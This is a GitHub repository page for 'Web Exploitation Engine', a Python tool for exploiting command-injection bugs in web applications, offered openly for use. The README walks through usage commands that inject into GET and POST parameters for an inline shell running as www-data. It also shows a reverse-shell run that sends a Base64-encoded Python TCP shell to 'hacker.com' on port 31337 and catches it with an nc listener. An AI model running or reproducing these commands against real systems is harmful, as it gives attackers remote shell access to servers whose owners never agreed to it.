Join GitHub today
GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.Sign up
Generic Command Exploitation Engine for exploiting web application command-injection bugs,.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
|Type||Name||Latest commit message||Commit time|
|Failed to load latest commit information.|
Web Exploitation Engine - Generic Command Injection Exploitation Utility. This is a simple enough utility written to exploit command injection bugs in web applications. I had abandoned this project a while ago, then saw the brilliant "rce.py" tool written by @LaNMaSteR53, and saw his elegant solution to the "how to denote where to put the payload" problem, so I shamelessly ripped his code to write this. This tool can either give an inline shell like the original rce.py (it uses the same functions, just rewritten to suit), or a reverse shell. Currently it only supports a Base64 encoded Reverse TCP shell payload, however the magic of the "payloads" module is that you can actually expand it. You just have to do a little work to add more payloads. So, how do I use this. The only mandatory argument is --url='URL HERE'. In the url, using the <rce> tag, you specify where to inject code in the request. For example: h4x# ./we.py --url='http://localhost/test/cmd.php?=<rce>' shell> id [*] Executed: id uid=33(www-data) gid=33(www-data) groups=33(www-data) shell> By default, it assumes a GET request and uses the inline shell mode. To specify a POST request, you pass the params and values just like a GET, except you specify --method=post to tell the parser it is a POST injection. For example: h4x# ./we.py --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post shell> id [*] Executed: id uid=33(www-data) gid=33(www-data) groups=33(www-data) shell> The --shell arguement tells it if you want an inline, or reverse shell. Default operation is the "inline shell" like the original rce.py script. To do a reverse shell, --shell=reverse is needed. You also must specify the host and port to connect to. --lhost and --lport arguments are, by default, 127.0.0.1 and 4444 respectively. So, to get a reverse shell sent to port 31337 on "hacker.com", using the above GET request exploit, we can do the following. h4x# ./we.py --url='http://localhost/test/cmd.php?cmd=<rce>' --shell=reverse --lhost=hacker.com --lport=31337 [+] Doing a reverse shell! [*] LHOST: hacker.com [*] LPORT: 31337 [!] Hope your listener is listening And over at "hacker.com" (localhost on my box for this demo), we get the following: # nc -lvp 31337 listening on [any] 31337 ... connect to [127.0.0.1] from localhost [127.0.0.1] 58794 /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ Reverse shell access works rather flawlessly. For now, just the python-reverse payload, however I hope to add a python bindshell soon, along with, perhaps, some Perl payloads for extra fun.